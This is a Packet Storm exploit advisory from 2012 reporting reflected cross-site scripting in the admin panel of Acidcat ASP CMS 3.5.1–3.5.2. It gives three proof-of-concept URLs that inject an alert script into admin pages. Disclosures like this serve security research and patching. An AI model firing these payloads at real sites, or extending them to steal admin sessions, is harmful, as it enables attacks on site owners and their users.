Acidcat ASP CMS 3.5.2 Cross Site Scripting

2012-01-21T00:00:00
ID PACKETSTORM:108869
Type packetstorm
Reporter d3v1l
Modified 2012-01-21T00:00:00

Description

                                        
                                            `###############################################################################################################   
  
# Exploit Title: Acidcat ASP CMS v 3.5.1 - 3.5.2 Admin Panel - Reflected Cros Site-Scripting ( XSS )   
  
# Script Page : http://www.acidcat.com  
  
# Date: 20-01-2012  
  
# Author : RandomStorm - http://www.randomstorm.com  
  
# Avram Marius Gabriel (d3v1l)  
  
# Tested on: Windows XP & Vista (IE9)   
  
  
###############################################################################################################   
  
# Cross-Site Scripting (XSS)   
  
# POC:   
  
# http://www.site.com/admin/admin_colors.asp?"><script>alert('XSS')</script>   
  
# http://www.site.com/admin/admin_config.asp?"><script>alert('XSS')</script>  
  
# http://www.site.com/admin/admin_cat_add.asp?"><script>alert('XSS')</script>   
  
  
################################################################################################################   
  
  
# Works on Internet Explorer v.9  
  
################################################################################################################  
`